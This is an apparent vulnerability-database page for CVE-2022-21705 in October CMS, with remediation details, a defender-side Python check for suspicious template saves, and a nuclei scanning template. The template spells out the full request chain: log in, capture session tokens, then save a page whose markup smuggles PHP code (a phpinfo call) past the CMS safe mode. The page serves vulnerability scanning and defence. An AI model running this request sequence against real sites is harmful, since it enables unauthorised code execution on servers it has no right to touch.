October CMS - Remote Code Execution

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | github.com | 49 Views

October CMS - Remote Code Execution, Build 474 patc

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2022-21705 | 23 Feb 2022 22:13 | circl |
| CNNVD | Octobercms Security Vulnerability | 23 Feb 2022 00:00 | cnnvd |
| CVE | CVE-2022-21705 | 23 Feb 2022 19:00 | cve |
| Cvelist | CVE-2022-21705 Authenticated remote code execution in octobercms | 23 Feb 2022 19:00 | cvelist |
| Github Security Blog | Authenticated remote code execution in October CMS | 23 Feb 2022 21:08 | github |
| NVD | CVE-2022-21705 | 23 Feb 2022 19:15 | nvd |
| OSV | CVE-2022-21705 Authenticated remote code execution in octobercms | 23 Feb 2022 19:00 | osv |
| OSV | GHSA-79JW-2F46-WV22 Authenticated remote code execution in October CMS | 23 Feb 2022 21:08 | osv |
| Prion | Design/Logic Flaw | 23 Feb 2022 19:15 | prion |
| Positive Technologies | PT-2022-15052 · Unknown · October Cms | 23 Feb 2022 00:00 | ptsecurity |

id: CVE-2022-21705

info:
  name: October CMS - Remote Code Execution
  author: iPhantasmic
  severity: high
  description: |
    October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation.
  reference:
    - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe
    - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22
    - https://cyllective.com/blog/post/octobercms-cve-2022-21705/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21705
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-21705
    cwe-id: CWE-74,NVD-CWE-Other
    epss-score: 0.08682
    epss-percentile: 0.94478
    cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: octobercms
    product: october
  tags: cve2022,cve,authenticated,rce,cms,octobercms,injection,vuln

http:
  - raw:
      - | # to obtain session_key and token
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
      - | # to perform authentication and obtain admin cookies
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}
      - | # to inject php code in Markup editor and perform exploit
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onSave
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0
      - | # to obtain theme
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onCreateTemplate
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&search=&type=page
      - | # to access the template page for generated exploit
        POST /backend/cms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
        X-OCTOBER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'function onInit()'
          - 'phpinfo()'
          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
        condition: and

      # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        name: session_key
        internal: true
        xpath:
          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
        attribute: value

      # Obtain _session_key for current OctoberCMS session

      - type: xpath
        name: token
        internal: true
        xpath:
          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
        attribute: value

      # Obtain _token for current OctoberCMS session

      - type: regex
        name: theme
        group: 1
        regex:
          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
        internal: true
        part: body

# Obtain current theme used for Markup editor of OctoberCMS
# digest: 490a0046304402202a0c5946d2f86f768adefa7d4992abd581681d6328bf38f760859a7887824e040220357f8d58fbe74f6d5ac3633a63b69c0046f053561039bfaea415ec69f70eb7ce:922c64590222798bb761d5b6d8e72950
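
A defender-side check for the save request shown in the template, as an added example that is not part of the original template or of October CMS: it decodes the `markup` field of an `onSave` request and flags a PHP open tag or a line holding only `==`, the separator between sections of an October CMS template file. The function name, the finding tags, the `SAMPLE` session values and the choice of these two heuristics are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# A line holding only "==" separates the sections of an October CMS template file.
SECTION_SEP = re.compile(r"^==[ \t]*$", re.MULTILINE)
PHP_OPEN = re.compile(r"<\?(?:php|=)", re.IGNORECASE)


def inspect_cms_save(headers, body):
    """Return finding tags for one POST /backend/cms request (empty list = clean).

    Hypothetical helper: headers is a dict of request headers, body is the raw
    application/x-www-form-urlencoded request body as captured by a proxy or WAF.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    if lowered.get("x-october-request-handler", "").strip() != "onSave":
        return []  # only template saves carry the markup field of interest
    fields = parse_qs(body, keep_blank_values=True)
    markup = fields.get("markup", [""])[0].replace("\r\n", "\n")
    findings = []
    if PHP_OPEN.search(markup):
        findings.append("php-open-tag-in-markup")
    if SECTION_SEP.search(markup):
        findings.append("section-separator-in-markup")
    return findings


# Constructed sample requests. The markup value of TEMPLATE_BODY is the one the
# template above sends; TWIG_BODY is ordinary Twig that uses "==" as an operator.
HANDLER = {"X-OCTOBER-REQUEST-HANDLER": "onSave"}
TEMPLATE_BODY = (
    "_session_key=SAMPLE&_token=SAMPLE&fileName=sample&templateType=page&theme=demo"
    "&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B"
    "%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code="
)
TWIG_BODY = (
    "_session_key=SAMPLE&_token=SAMPLE&fileName=sample&templateType=page&theme=demo"
    "&markup=%7B%25+if+a+%3D%3D+b+%25%7D%3Ch1%3Eok%3C%2Fh1%3E%7B%25+endif+%25%7D&code="
)

if __name__ == "__main__":
    for name, body in (("template payload", TEMPLATE_BODY), ("plain Twig", TWIG_BODY)):
        print(name, inspect_cms_save(HANDLER, body))
```

The separator check matches only a line that consists of `==`, so Twig comparisons such as `{% if a == b %}` are not flagged.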

04 Feb 2026 07:00 Current
Vulners AI Score: 7.6 (High risk)
CVSS 3.1: 7.2
CVSS 2: 8.5
EPSS: 0.08682